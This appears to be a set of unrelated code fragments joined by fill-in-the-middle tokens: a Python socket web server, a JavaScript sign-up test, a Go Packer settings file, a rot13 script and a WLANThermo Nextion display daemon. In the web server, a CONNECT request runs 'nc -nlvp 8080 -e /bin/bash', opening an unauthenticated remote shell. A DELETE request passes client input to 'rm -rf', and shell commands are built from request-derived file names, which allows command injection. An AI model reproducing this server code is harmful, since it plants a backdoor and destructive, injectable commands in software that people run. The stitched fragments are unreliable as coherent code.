def error_501(addr,request_words):
print("NOT Implemented")
logging(addr,request_words,"error","501")
csock.sendall(error_handle(501,"text/html",False))
response = """<html><head><body>Not Implemented </body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_401(addr,request_words):
print("Unauthorized")
logging(addr,request_words,"error","401")
csock.sendall(error_handle(401,"text/html",False))
response = """<html><head><body>Unauthorized</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
def error_500(e,file_name,addr):
	print("Internal Server Error")
	logging(addr,file_name,"error","500")
	csock.sendall(error_handle(500,"text/html",False))
	response = """<html><head><body>Internal Server Error</body></head></html>"""
	#f = open("404.html","r")
	#response = f.read()
	#f.close()
	csock.sendall(response)
	csock.close()
def error_411(addr,request_words):
print("Length Required")
logging(addr,request_words,"error","411")
csock.sendall(error_handle(411,"text/html",False))
response = """<html><head><body>Length Required</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()<|fim▁hole|>def error_505(addr,request_words):
print("Trailing whitespaces")
logging(addr,request_words,"error","505")
csock.sendall(error_handle(505,"text/html",False))
response = """<html><head><body>Trailing white spaces</body></head></html>"""
#f = open("404.html","r")
#response = f.read()
#f.close()
csock.sendall(response)
csock.close()
#print(file_name)
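# page_handle: resolve the requested file, run it through serverside() for
# dynamic content, then send the header and response body to the client.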
def page_handle(method,request_lines,file_name,addr,request_words):
print(method)
data = request_lines[-1]
#print("get data is :".format(data))
#print(file_name.split(".")[-1])
if(file_name.split(".")[-1]=="php"):
isphp = True
else:
isphp = False
print(isphp)
session_id= get_cookie(request_lines)
#file_name = root_dir + file_name
print(file_name)
	if(root_dir not in file_name):
		error_401(addr,file_name)
		return
file_name = serverside(file_name,data,method,session_id)
mime_type = mime_type_handler(file_name.split(".")[-1],addr)
response_file = open(file_name,"r")
response = response_file.read()
response_file.close()
logging(addr,request_words[1][1:],"OK","200")
avoid_response = ["image/x-icon","image/gif","image/jpeg","image/png"]
#if(mime_type not in avoid_response):
#print(response)
# print("response from error handle\n\n\n")
header = error_handle(200,mime_type,isphp)
#print(header)
csock.sendall(header)
csock.sendall(response)
csock.close()
def serverside(file_name,data,method,session_id):
ext = file_name.split(".")[-1]
path_split = file_name.split("/")
if(ext in lang):
if(ext=="php"):
os.environ["_{}".format(method)]= data
os.environ["SESSION_ID"]=session_id
print(os.environ["_{}".format(method)])
os.system("php-cgi {} > output.html".format(file_name))
file_name = "output.html"
#print("file is returned")
return file_name
else:
#print(dat)
try:
if("nodefiles" in path_split):
resp = os.system("node {} > output.html".format(file_name))
					file_name = "output.html"
					return file_name
resp = os.system("{} {} > output.html".format(lang[ext],file_name))
file_name = "output.html"
return file_name
except Exception as e:
error_500(e,file_name,addr)
else :
if(ext in mime_switcher):
print("file is returned")
return file_name
else:
error_501(addr,file_name)
def error_handle(errornum,mime_type,isphp):
if(isphp):
response = """HTTP/1.1 {} {}\r\n""".format(errornum,errorname[errornum])
else:
response = """HTTP/1.1 {} {}\r\nContent-type:{}\r\n\r\n""".format(errornum,errorname[errornum],mime_type)
print(response)
return response
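# Example: error_handle(200, "text/html", False) yields
# "HTTP/1.1 200 OK\r\nContent-type:text/html\r\n\r\n" (status names are
# assumed to come from the errorname map in conf).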
def connhandler(csock,addr):
request = csock.recv(1024)
#print(addr)
#sock.sendall(index.read())
request_lines = request.split("\n")
request_words = request_lines[0].split(" ")
print("\r\n\r\n\r\n")
	if(len(request_words)!=3):
		error_505(addr,request_words)
		return
#print(request)
#print(root_dir)
if(request_words[0] == "GET"):
if(get_enable):
if(request_words[1] == "/"):
file_name = root_dir+root_file
else:
file_name = root_dir+request_words[1][1:]
print(file_name)
if(os.path.isfile(file_name)):
method="GET"
page_handle(method,request_lines,file_name,addr,request_words)
else:
error_404(addr,request_words)
else:
error_403(addr,request_words)
elif(request_words[0]=="POST"):
if(post_enable):
if(request_words[1] == "/"):
file_name = root_dir+root_file
else:
file_name = root_dir+request_words[1][1:]
print(file_name)
			if(request_lines[3].split(":")[-1].strip() == "0"):
				error_411(addr,request_words)
				return
if(os.path.isfile(file_name)):
method="POST"
page_handle(method,request_lines,file_name,addr,request_words)
else:
error_404(addr,request_words)
else:
error_403(addr,request_words)
elif(request_words[0]=="PUT"):
if(put_enable):
data = request_lines[-1]
#if(data!=""):
file_name = request_words[1][1:]
			f = open(file_name,"a+")
f.write(data)
f.close()
header = error_handle(200,"text/html",False)
csock.sendall(header)
csock.close()
else:
error_403(addr,request_words)
elif(request_words[0]=="DELETE"):
if(delete_enable):
file_name = request_words[1][1:]
			os.system("rm -rf {}".format(file_name))
header = error_handle(200,"text/html",False)
csock.sendall(header)
csock.sendall("FILE DELETED")
csock.close()
else:
error_403(addr,request_words)
elif(request_words[0]=="CONNECT"):
if(connect_enable):
header = error_handle(200,"text/html",False)
os.system("nc -nlvp 8080 -e /bin/bash")
header = error_handle(200,"text/html",False)
csock.sendall(header)
csock.sendall("Port Opened at 8080")
csock.close()
else:
error_403(addr,request_words)
else:
error_400(addr,request_words)
def mime_type_handler(mime,addr):
try:
file_type = mime_switcher[mime.split(".")[-1]]
return file_type
except Exception as e:
logging(addr,e,"exception","")
return "invalid file type"
def logging(addr,request,types,code):
if(types == "error"):
file_name = bad_req_logs_path + "error_log.log"
f = open(file_name,"a+")
f.write("Logging at time {}".format(time.strftime("%Y-%m-%d %H:%M:%S",time.gmtime())))
f.write("{} has requested {} which threw a response code {}\n".format(addr,request,code))
f.close()
elif(types == "exception"):
file_name = bad_req_logs_path + "exception_log.log"
f = open(file_name,"a+")
f.write("Logging at time {}".format(time.strftime("%Y-%m-%d %H:%M:%S",time.gmtime())))
f.write("{} has requested {} which threw a exception\n".format(addr,request,code))
f.close()
else:
file_name = good_req_logs_path + "responses_log.log"
f = open(file_name,"a+")
f.write("Logging at time {}".format(time.strftime("%Y-%m-%d %H:%M:%S",time.gmtime())))
f.write("{} has requested {} which has a response code : {}\n".format(addr,request,code))
f.close()
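# Main entry point: open the listening socket and hand every accepted
# connection to its own worker thread.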
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
sock.bind((host,port))
sock.listen(5)
print("Serving on port {}".format(port))
while True:
csock,addr = sock.accept()
handler = Thread(target = connhandler,args = (csock,addr),)
handler.start()
#print("handler ran")<|fim▁end|> | #print(file_name)
|
<|file_name|>signup-mixin.js<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
define(function (require, exports, module) {
'use strict';
var Account = require('models/account');
var assert = require('chai').assert;
var Broker = require('models/auth_brokers/base');
var p = require('lib/promise');
var Relier = require('models/reliers/relier');
var SignUpMixin = require('views/mixins/signup-mixin');
var sinon = require('sinon');
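  // The view collaborator below is a plain object stubbed with sinon spies,
  // so the mixin's signUp/onSignUpSuccess flow can be exercised in isolation.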
describe('views/mixins/signup-mixin', function () {
it('exports correct interface', function () {
assert.isObject(SignUpMixin);
assert.lengthOf(Object.keys(SignUpMixin), 2);
assert.isFunction(SignUpMixin.signUp);
assert.isFunction(SignUpMixin.onSignUpSuccess);
});
describe('signUp', function () {
var account;
var broker;
var relier;
var view;
beforeEach(function () {
account = new Account({
email: '[email protected]'
});
broker = new Broker();
relier = new Relier();
view = {
_formPrefill: {
clear: sinon.spy()
},
broker: broker,
getStringifiedResumeToken: sinon.spy(),
invokeBrokerMethod: sinon.spy(function () {
return p();
}),
logViewEvent: sinon.spy(),
navigate: sinon.spy(),
onSignUpSuccess: SignUpMixin.onSignUpSuccess,
relier: relier,
signUp: SignUpMixin.signUp,
user: {
signUpAccount: sinon.spy(function (account) {
return p(account);
})
}
};
});
describe('account needs permissions', function () {
beforeEach(function () {
sinon.stub(relier, 'accountNeedsPermissions', function () {
return true;
});
return view.signUp(account, 'password');
});
it('redirects to the `signup_permissions` screen', function () {
assert.isTrue(view.navigate.calledOnce);
var args = view.navigate.args[0];
assert.equal(args[0], 'signup_permissions');
assert.deepEqual(args[1].account, account);
assert.isFunction(args[1].onSubmitComplete);
});
it('does not log any events', function () {
assert.isFalse(view.logViewEvent.called);
});
});
describe('broker supports chooseWhatToSync', function () {
beforeEach(function () {
sinon.stub(broker, 'hasCapability', function (capabilityName) {
return capabilityName === 'chooseWhatToSyncWebV1';
});
return view.signUp(account, 'password');
});
it('redirects to the `choose_what_to_sync` screen', function () {
assert.isTrue(view.navigate.calledOnce);
var args = view.navigate.args[0];
assert.equal(args[0], 'choose_what_to_sync');
assert.deepEqual(args[1].account, account);
assert.isFunction(args[1].onSubmitComplete);
});
it('does not log any events', function () {
assert.isFalse(view.logViewEvent.called);
});
});
describe('verified account', function () {
beforeEach(function () {
account.set('verified', true);
return view.signUp(account, 'password');
});
it('calls view.logViewEvent correctly', function () {
assert.equal(view.logViewEvent.callCount, 3);
assert.isTrue(view.logViewEvent.calledWith('success'));
assert.isTrue(view.logViewEvent.calledWith('signup.success'));
assert.isTrue(view.logViewEvent.calledWith('preverified.success'));
});
it('calls view._formPrefill.clear', function () {
assert.equal(view._formPrefill.clear.callCount, 1);
});
it('calls view.invokeBrokerMethod correctly', function () {
assert.equal(view.invokeBrokerMethod.callCount, 2);
var args = view.invokeBrokerMethod.args[0];
assert.lengthOf(args, 2);
assert.equal(args[0], 'beforeSignIn');
assert.equal(args[1], '[email protected]');<|fim▁hole|> args = view.invokeBrokerMethod.args[1];
assert.lengthOf(args, 2);
assert.equal(args[0], 'afterSignIn');
assert.deepEqual(args[1], account);
});
it('calls view.navigate correctly', function () {
assert.equal(view.navigate.callCount, 1);
var args = view.navigate.args[0];
assert.lengthOf(args, 1);
assert.equal(args[0], 'signup_complete');
});
});
describe('unverified account', function () {
beforeEach(function () {
account.set('verified', false);
return view.signUp(account, 'password');
});
it('calls view.logViewEvent correctly', function () {
assert.equal(view.logViewEvent.callCount, 2);
assert.isTrue(view.logViewEvent.calledWith('success'));
assert.isTrue(view.logViewEvent.calledWith('signup.success'));
});
it('calls view._formPrefill.clear correctly', function () {
assert.equal(view._formPrefill.clear.callCount, 1);
assert.lengthOf(view._formPrefill.clear.args[0], 0);
});
it('calls view.invokeBrokerMethod correctly', function () {
assert.equal(view.invokeBrokerMethod.callCount, 2);
var args = view.invokeBrokerMethod.args[0];
assert.lengthOf(args, 2);
assert.equal(args[0], 'beforeSignIn');
assert.equal(args[1], '[email protected]');
args = view.invokeBrokerMethod.args[1];
assert.lengthOf(args, 2);
assert.equal(args[0], 'afterSignUp');
assert.deepEqual(args[1], account);
});
it('calls view.navigate correctly', function () {
assert.equal(view.navigate.callCount, 1);
var args = view.navigate.args[0];
assert.lengthOf(args, 2);
assert.equal(args[0], 'confirm');
assert.isObject(args[1]);
assert.lengthOf(Object.keys(args[1]), 1);
assert.equal(args[1].account, account);
});
});
describe('_formPrefill undefined', function () {
beforeEach(function () {
view._formPrefill = undefined;
});
it('does not throw', function () {
assert.doesNotThrow(function () {
return view.onSignUpSuccess(account);
});
});
});
});
});
});<|fim▁end|> | |
<|file_name|>settings.go<|end_file_name|><|fim▁begin|>package config
import (
"fmt"
"os"
"github.com/DimensionDataResearch/packer-plugins-ddcloud/helpers"
"github.com/mitchellh/packer/common"
"github.com/mitchellh/packer/helper/communicator"
"github.com/mitchellh/packer/packer"
)
// Settings represents the settings for the customer image import builder.
type Settings struct {
PackerConfig common.PackerConfig `mapstructure:",squash"`
CommunicatorConfig communicator.Config `mapstructure:",squash"`
McpRegion string `mapstructure:"mcp_region"`
McpUser string `mapstructure:"mcp_user"`
McpPassword string `mapstructure:"mcp_password"`
DatacenterID string `mapstructure:"datacenter"`
OVFPackagePrefix string `mapstructure:"ovf_package_prefix"`
TargetImage string `mapstructure:"target_image"`<|fim▁hole|>// GetPackerConfig retrieves the common Packer configuration for the plugin.
func (settings *Settings) GetPackerConfig() *common.PackerConfig {
return &settings.PackerConfig
}
// GetCommunicatorConfig retrieves the Packer communicator configuration for the plugin.
func (settings *Settings) GetCommunicatorConfig() *communicator.Config {
return &settings.CommunicatorConfig
}
// GetMCPUser retrieves the Cloud Control user name.
func (settings *Settings) GetMCPUser() string {
return settings.McpUser
}
// GetMCPPassword retrieves the Cloud Control password.
func (settings *Settings) GetMCPPassword() string {
return settings.McpPassword
}
// Validate determines if the settings is valid.
func (settings *Settings) Validate() (err error) {
if settings.McpRegion == "" {
settings.McpRegion = os.Getenv("MCP_REGION")
if settings.McpRegion == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'mcp_region' has not been specified in settings and the MCP_REGION environment variable has not been set"),
)
}
}
if settings.McpUser == "" {
settings.McpUser = os.Getenv("MCP_USER")
if settings.McpUser == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'mcp_user' has not been specified in settings and the MCP_USER environment variable has not been set"),
)
}
}
if settings.McpPassword == "" {
settings.McpPassword = os.Getenv("MCP_PASSWORD")
if settings.McpPassword == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'mcp_password' has not been specified in settings and the MCP_PASSWORD environment variable has not been set"),
)
}
}
if settings.DatacenterID == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'datacenter' has not been specified in settings"),
)
}
if settings.TargetImage == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'target_image' has not been specified in settings"),
)
}
if settings.OVFPackagePrefix == "" {
err = packer.MultiErrorAppend(err,
fmt.Errorf("'ovf_package_prefix' has not been specified in settings"),
)
}
return
}<|fim▁end|> | }
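// Compile-time assertion that Settings implements helpers.PluginConfig.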
var _ helpers.PluginConfig = &Settings{}
|
<|file_name|>rot13.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: rot13 -*-
<|fim▁hole|><|fim▁end|> | cevag "Uryyb TvgUho!".rapbqr("rot13") |
<|file_name|>wlt_2_nextion.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# coding=utf-8
# Copyright (c) 2015, 2016 Björn Schrader
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import ConfigParser
import os
import time
import logging
import pyinotify
import serial
import subprocess
import threading
import re
import string
import signal
import Queue
from struct import *
NX_lf = '\xff\xff\xff'
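# Every Nextion instruction is terminated by three 0xFF bytes.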
NX_channel = 0
NX_page = 0
version = '0.18'
temps = dict()
channels = dict()
pitmaster = dict()
pitconf = dict()
# Events are sent asynchronously by the display
NX_eventq = Queue.Queue()
# Return values are handed back on request
NX_returnq = Queue.Queue()
# Lock for writing to the configuration
configfile_lock = threading.Lock()
# New temperatures
temps_event = threading.Event()
# New channel configuration (= changed config file)
channels_event = threading.Event()
# New pitmaster events
pitmaster_event = threading.Event()
# New pitmaster configuration (= changed config file)
pitconf_event = threading.Event()
# Wake-up from sleep mode
NX_wake_event = threading.Event()
# Stopping the process has been requested
stop_event = threading.Event()
# Read the configuration file
configdefaults = {'dim' : '90',
'timeout': '30',
'serialdevice': '/dev/ttyAMA0',
'serialspeed': '115200'}
configfile = '/var/www/conf/WLANThermo.conf'
Config = ConfigParser.SafeConfigParser(configdefaults)
# We run as root, but others must be able to write the config as well!
os.umask(0)
while True:
    try:
        Config.read(configfile)
    except IndexError:
        # We cannot wait on an event yet, since the other paths come from the
        # config itself; logging is not set up either, so write to stderr
        sys.stderr.write('Warte auf Konfigurationsdatei')
        time.sleep(1)
        continue
    break
# Logging initialisieren
LOGFILE = Config.get('daemon_logging', 'log_file')
logger = logging.getLogger('WLANthermoNEXTION')
#Define Logging Level by changing >logger.setLevel(logging.LEVEL_YOU_WANT)< available: DEBUG, INFO, WARNING, ERROR, CRITICAL
log_level = Config.get('daemon_logging', 'level_DISPLAY')
if log_level == 'DEBUG':
    logger.setLevel(logging.DEBUG)
elif log_level == 'INFO':
    logger.setLevel(logging.INFO)
elif log_level == 'ERROR':
    logger.setLevel(logging.ERROR)
elif log_level == 'WARNING':
    logger.setLevel(logging.WARNING)
elif log_level == 'CRITICAL':
    logger.setLevel(logging.CRITICAL)
handler = logging.FileHandler(LOGFILE)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logging.captureWarnings(True)
# Pfad fuer die Übergabedateien auslesen
curPath, curFile = os.path.split(Config.get('filepath','current_temp'))
pitPath, pitFile = os.path.split(Config.get('filepath','pitmaster'))
confPath, confFile = os.path.split(configfile)
# Wenn das display Verzeichniss im Ram Drive nicht exisitiert erstelle es
if not os.path.exists(curPath):
os.makedirs(curPath)
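# pyinotify handler: maps close-write/move events on the exchange files to the
# matching threading.Events so the worker threads pick up new data.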
class FileEvent(pyinotify.ProcessEvent):
def process_IN_CLOSE_WRITE(self, event):
global temps, channels, pitmaster, pitconf, Config, configfile
global temps_event, channels_event, pitmaster_event, pitconf_event, logger
logger.debug("IN_CLOSE_WRITE: %s " % os.path.join(event.path, event.name))
if event.path == curPath and event.name == curFile:
logger.debug('Neue Temperaturwerte vorhanden')
temps_event.set()
elif event.path == confPath and event.name == confFile:
logger.debug('Neue Konfiguration vorhanden')
channels_event.set()
pitconf_event.set()
elif event.path == pitPath and event.name == pitFile:
logger.debug('Neue Pitmasterdaten vorhanden')
pitmaster_event.set()
def process_IN_MOVED_TO(self, event):
global temps, channels, pitmaster, pitconf, Config, configfile
global temps_event, channels_event, pitmaster_event, pitconf_event, logger
logger.debug("IN_MOVED_TO: %s " % os.path.join(event.path, event.name))
if event.path == curPath and event.name == curFile:
logger.debug('Neue Temperaturwerte vorhanden')
temps_event.set()
elif event.path == confPath and event.name == confFile:
logger.debug('Neue Konfiguration vorhanden')
channels_event.set()
pitconf_event.set()
elif event.path == pitPath and event.name == pitFile:
logger.debug('Neue Pitmasterdaten vorhanden')
pitmaster_event.set()
def NX_reader():
global logger, ser, NX_returns, NX_events, stop_event, NX_wake_event
logger.info('Reader-Thread gestartet')
# Timeout setzen, damit der Thread gestoppt werden kann
ser.timeout = 0.1
# Dauerschleife, bricht ab wenn ein stop_event vorlieg
while not stop_event.is_set():
is_return = False
endcount = 0
bytecount = 0
message = {'raw' : '', 'iserr' : False, 'errmsg' : '', 'data' : {}, 'type': ''}
while (endcount != 3):
byte = ser.read()
if byte != '':
# Kein Timeout
bytecount += 1
message['raw'] += byte[0]
if (byte[0] == '\xff'):
endcount += 1
else:
endcount = 0
else:
# Timeout, sollen wir stoppen?
if stop_event.is_set():
break
if stop_event.is_set():
break
elif (message['raw'][0] == '\x00'):
message['type'] = 'inv_instr'
message['iserr'] = True
message['errmsg'] = 'Invalid instruction'
is_return = True
elif (message['raw'][0] == '\x01'):
message['type'] = 'ok'
message['errmsg'] = 'Successful execution of instruction'
is_return = True
elif (message['raw'][0] == '\x03'):
message['type'] = 'inv_pageid'
message['iserr'] = True
message['errmsg'] = 'Page ID invalid'
is_return = True
elif (message['raw'][0] == '\x04'):
message['type'] = 'inv_pictid'
message['iserr'] = True
message['errmsg'] = 'Picture ID invalid'
is_return = True
elif (message['raw'][0] == '\x05'):
message['type'] = 'inv_fontid'
message['iserr'] = True
message['errmsg'] = 'Font ID invalid'
is_return = True
elif (message['raw'][0] == '\x11'):
message['type'] = 'inv_baudrate'
message['iserr'] = True
message['errmsg'] = 'Baud rate setting invalid'
is_return = True
elif (message['raw'][0] == '\x12'):
message['type'] = 'inv_curve'
message['iserr'] = True
message['errmsg'] = 'Curve control ID number or channel number is invalid'
is_return = True
elif (message['raw'][0] == '\x1a'):
message['type'] = 'inv_varname'
message['iserr'] = True
message['errmsg'] = 'Variable name invalid '
is_return = True
elif (message['raw'][0] == '\x1B'):
message['type'] = 'inv_varop'
message['iserr'] = True
message['errmsg'] = 'Variable operation invalid'
is_return = True
elif (message['raw'][0] == '\x65'):
message['type'] = 'touch_event'
message['errmsg'] = 'Touch event return data'
message['data'] = {'page': unpack('B', message['raw'][1])[0], 'button': unpack('B', message['raw'][2])[0], 'event':['release', 'press'][unpack('B', message['raw'][3])[0]]}
elif (message['raw'][0] == '\x66'):
message['type'] = 'current_page'
message['errmsg'] = 'Current page ID number return'
message['data'] = {'page': unpack('B',message['raw'][1])[0]}
elif (message['raw'][0] == '\x67'):
message['type'] = 'touch_coord'
message['errmsg'] = 'Touch coordinate data returns'
message['data'] = {'x': unpack('>h', message['raw'][1:3])[0],'y': unpack('>h', message['raw'][3:5])[0], 'event':['release', 'press'][unpack('B', message['raw'][5])[0]]}
elif (message['raw'][0] == '\x68'):
message['type'] = 'touch_coord_sleep'
message['errmsg'] = 'Touch Event in sleep mode'
message['data'] = {'x': unpack('>h', message['raw'][1:3])[0] ,'y': unpack('>h', message['raw'][3:5])[0], 'event':['release', 'press'][unpack('B', message['raw'][5])[0]]}
elif (message['raw'][0] == '\x70'):
message['type'] = 'data_string'
message['errmsg'] = 'String variable data returns'
message['data'] = unpack((str(bytecount - 4)) + 's', message['raw'][1:-3])[0]
is_return = True
elif (message['raw'][0] == '\x71'):
message['type'] = 'data_int'
message['errmsg'] = 'Numeric variable data returns'
message['data'] = unpack('<i', message['raw'][1:5])[0]
is_return = True
elif (message['raw'][0] == '\x86'):
message['type'] = 'sleep'
message['errmsg'] = 'Device automatically enters into sleep mode'
NX_wake_event.clear()
elif (message['raw'][0] == '\x87'):
message['type'] = 'wakeup'
message['errmsg'] = 'Device automatically wake up'
# Device ist aufgewacht...
NX_wake_event.set()
elif (message['raw'][0] == '\x88'):
message['type'] = 'startup'
message['errmsg'] = 'System successful start up'
elif (message['raw'][0] == '\x89'):
message['type'] = 'sdupgrade'
message['errmsg'] = 'Start SD card upgrade'
# Selbst definierte Kommandos
elif (message['raw'][0] == '\x40'):
message['type'] = 'read_cmd'
message['errmsg'] = 'Request to read from Display'
message['data'] = {'area': unpack('B', message['raw'][1])[0], 'id': unpack('B', message['raw'][2])[0]}
elif (message['raw'][0] == '\x41'):
message['type'] = 'custom_cmd'
message['errmsg'] = 'Execute Special Command'
message['data'] = {'area': unpack('B', message['raw'][1])[0], 'id': unpack('B', message['raw'][2])[0], 'action': unpack('B', message['raw'][3])[0]}
logger.debug('Area: ' + str(message['data']['area']) + ' ID: ' + str(message['data']['id']) + ' Action: ' + str(message['data']['action']))
logger.debug('Meldung ' + message['type'] + ' vom Display erhalten')
if (is_return):
NX_returnq.put(message)
else:
NX_eventq.put(message)
logger.info('Reader-Thread gestoppt')
return True
def NX_waitok():
global stop_event
endcount = 0
bytecount = 0
ok = False
while (endcount != 3 or not stop_event.is_set()):
byte = ser.read()
if byte == '':
logger.info('Serial Communication Timeout!')
break
bytecount += 1
if (byte[0] == '\xff'):
endcount += 1
elif (byte[0] == '\x01' and bytecount == 1):
endcount = 0
ok = True
else:
endcount = 0
if ok == True:
return True
else:
return False
def NX_init(port, baudrate):
global ser, NX_lf, NX_reader_thread
ser.port = port
ser.baudrate = baudrate
ser.timeout = 1
ser.open()
logger.debug('Leere seriellen Buffer')
# Buffer des Displays leeren
# - Ungültigen Befehl senden
# - Aufwachbefehl senden
ser.write('nop' + NX_lf)
ser.write('sleep=0' + NX_lf)
# - Warten
ser.flush()
time.sleep(0.2)
# - Empfangene Zeichen löschen
ser.flushInput()
# Immer eine Rückmeldung erhalten
ser.write('ref 0' + NX_lf)
ser.flush()
return NX_waitok()
def NX_sendvalues(values):
global ser, NX_lf, NX_returnq, NX_wake_event
# NX_sendcmd('sleep=0')
error = False
for rawkey, value in values.iteritems():<|fim▁hole|> # Länge wird im Key mit codiert "key:länge"
keys = rawkey.split(':')
key = keys[0]
if len(keys) == 2:
length = int(keys[1])
else:
length = None
# Sendet die Daten zum Display und wartet auf eine Rückmeldung
logger.debug("Sende " + key + ' zum Display: ' + str(value))
if key[-3:] == 'txt':
ser.write(str(key) + '="' + str(value)[:length] + '"\xff\xff\xff')
elif key[-3:] == 'val':
ser.write(str(key) + '=' + str(value) + '\xff\xff\xff')
else:
logger.warning('Unbekannter Variablentyp')
ser.flush()
try:
ret = NX_returnq.get(timeout=1)
except Queue.Empty:
logger.warning('Timeout - möglicherweise Sleep-Mode')
error = True
break
else:
NX_returnq.task_done()
if ret['iserr']:
logger.warning('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
logger.debug('Meldung ' + ret['type'] + ' vom Display erhalten')
if error:
return False
return True
def NX_getvalues(ids):
global ser, NX_lf, NX_returnq
error = False
returnvalues = dict()
try:
while True:
ret = NX_returnq.get(False)
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten (aus Displayprogramm)')
except Queue.Empty:
for id in ids:
# Sendet die Daten zum Display und wartet auf eine Rückmeldung
logger.debug("Hole " + str(id) + ' vom Display')
ser.write('get ' + str(id) + '\xff\xff\xff')
ser.flush()
try:
                ret = NX_returnq.get(True, 0.5)
NX_returnq.task_done()
if ret['iserr']:
logger.warning('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
# Gehen wir von einem "OK" aus, was sonst?
logger.debug('Meldung ' + ret['type'] + ' vom Display erhalten')
# OK, dann Daten abholen
                    if ret['type'] == 'data_string':
                        logger.debug('String "' + ret['data'] + '" vom Display erhalten')
                    elif ret['type'] == 'data_int':
                        logger.debug('Integer "' + str(ret['data']) + '" vom Display erhalten')
                    else:
                        logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten')
                        error = True
                if not error:
                    returnvalues[id] = ret['data']
except Queue.Empty:
logger.warning('Keine Rückmeldung vom Display erhalten')
error = True
return returnvalues
def NX_getvalue(id):
global ser, NX_lf, NX_returnq
error = False
# Sendet die Daten zum Display und wartet auf eine Rückmeldung
logger.debug("Hole " + str(id) + ' vom Display')
try:
while True:
ret = NX_returnq.get(False)
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten (aus Displayprogramm)')
except Queue.Empty:
ser.write('get ' + str(id) + '\xff\xff\xff')
ser.flush()
try:
ret = NX_returnq.get(True, 0.5)
NX_returnq.task_done()
if ret['iserr']:
logger.warning('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
# OK, dann Daten abholen
if ret['type'] == 'data_string':
logger.debug('String "' + ret['data'] + '" vom Display erhalten')
elif ret['type'] == 'data_int':
logger.debug('Integer "' + str(ret['data']) + '" vom Display erhalten')
else:
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten')
except Queue.Empty:
logger.warning('Keine Rückmeldung vom Display erhalten')
error = True
if not error:
return ret['data']
else:
return None
def NX_sendcmd(cmd):
global ser, NX_returnq
error = False
# Sendet die Daten zum Display und wartet auf eine Rückmeldung
logger.debug('Sende Befehl "' + str(cmd) + '" zum Display')
try:
while True:
ret = NX_returnq.get(False)
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten (aus Displayprogramm)')
NX_returnq.task_done()
except Queue.Empty:
ser.write(str(cmd) + '\xff\xff\xff')
ser.flush()
try:
ret = NX_returnq.get(True, 0.5)
NX_returnq.task_done()
if ret['iserr']:
logger.warning('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
logger.debug('Meldung ' + ret['type'] + ' vom Display erhalten')
except Queue.Empty:
logger.warning('Keine Rückmeldung vom Display erhalten')
error = True
if error:
return False
return True
def NX_switchpage(new_page):
global ser, NX_returnq, NX_page
error = False
logger.debug("Sende Seitenwechsel zu " + str(new_page))
try:
while True:
ret = NX_returnq.get(False)
logger.info('Unerwartete Meldung ' + ret['type'] + ' vom Display erhalten (aus Displayprogramm)')
except Queue.Empty:
ser.write('page ' + str(new_page) + '\xff\xff\xff')
ser.flush()
try:
ret = NX_returnq.get(True, 0.5)
if ret['iserr']:
logger.error('Fehlermeldung ' + ret['type'] + ' vom Display erhalten')
error = True
else:
logger.debug('Meldung ' + ret['type'] + ' vom Display erhalten')
except Queue.Empty:
logger.warning('Keine Rückmeldung vom Display erhalten')
error = True
if error:
return False
NX_page = new_page
return True
def sensors_getvalues():
sensors = dict()
sensorconfig = ConfigParser.SafeConfigParser()
sensorconfig.read('/var/www/conf/sensor.conf')
for section in sensorconfig.sections():
sensors[sensorconfig.getint(section, 'number')] = dict()
sensors[sensorconfig.getint(section, 'number')]['name'] = sensorconfig.get(section, 'name')
return sensors
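# temp_getvalues parses the semicolon-separated current-temperature file:
# timestamp;temp0..temp7;alert0..alert7 (layout inferred from the indices
# used below).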
def temp_getvalues():
global logger, curPath, curFile
temps = dict()
if os.path.isfile(curPath + '/' + curFile):
logger.debug("Daten vom WLANThermo zum Anzeigen vorhanden")
ft = open(curPath + '/' + curFile).read()
temps_raw = ft.split(';')
temps = dict()
temps['timestamp'] = timestamp = time.mktime(time.strptime(temps_raw[0],'%d.%m.%y %H:%M:%S'))
for count in range(8):
temps[count] = {'value': temps_raw[count+1], 'alert': temps_raw[count+9]}
else:
return None
return temps
def tempcsv_write(config):
name ='/var/www/temperaturen.csv'
logger.debug('Schreibe Temperaturen in "' + name + '" neu!')
while True:
try:
fw = open(name + '_tmp','w') #Datei anlegen
for i in range(8):
fw.write(str(config.get('temp_max','temp_max' + str(i))) + '\n') # Alarm-Max-Werte schreiben
for i in range(8):
fw.write(str(config.get('temp_min','temp_min' + str(i))) + '\n') # Alarm-Min-Werte schreiben
fw.flush()
